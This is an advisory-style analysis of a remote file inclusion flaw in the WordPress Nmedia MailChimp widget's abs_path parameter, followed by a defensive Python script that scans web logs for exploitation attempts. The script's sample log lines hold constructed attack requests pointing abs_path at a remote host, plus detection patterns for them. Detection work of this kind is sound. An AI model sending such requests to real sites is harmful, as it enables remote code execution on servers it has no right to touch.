WordPress Nmedia MailChimp widget “abs_path” remote file inclusion vulnerability

Advisory
Secunia Advisory SA 49538

Analysis
This vulnerability is nothing but a textbook arbitrary file inclusion vulnerability. The file /api_mailchimp/postToMailChimp.php is used to interact with the MailChimp API, but in its very first 2 lines of executable code it goes ahead and accepts a path for loading a file.

We can exploit this by making the following request, where the URL hosts a file called ‘wp-load.php’ or otherwise returns PHP code, or by using the proof of concept code.
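For defenders, requests of this shape can be found in web server access logs. The following is an added example, not code from the advisory or the plugin: it flags hits on postToMailChimp.php whose abs_path value points off the local filesystem. It assumes combined-format logs and that the parameter arrives in the query string (POST bodies are not logged); the log lines, hosts and the PLUGIN_DIR path segment are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path from the advisory text; parameter name from the advisory title.
SCRIPT = "/api_mailchimp/postToMailChimp.php"
PARAM = "abs_path"
# Client, method, target and status of a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# A URI scheme or a protocol-relative prefix means the include path is not local.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded values are still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client, status, value) for a remote abs_path request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith(SCRIPT.lower()):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(value)
        if REMOTE_RE.match(value):
            return client, int(status), value
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines; PLUGIN_DIR stands in for the plugin's directory.
P = "/wp-content/plugins/PLUGIN_DIR" + SCRIPT
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET {P}?abs_path=http://files.example.invalid/ HTTP/1.1" 200 512',
    f'203.0.113.8 - - [01/Jan/2024:10:01:09 +0000] "GET {P}?abs_path=http%253A%252F%252Ffiles.example.invalid%252F HTTP/1.1" 500 0',
    f'198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET {P}?abs_path=/var/www/html/ HTTP/1.1" 200 87',
    '198.51.100.5 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?abs_path=http://files.example.invalid/ HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged line only shows the script answered; whether the include succeeded depends on the server's PHP configuration.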

Proof of concept code
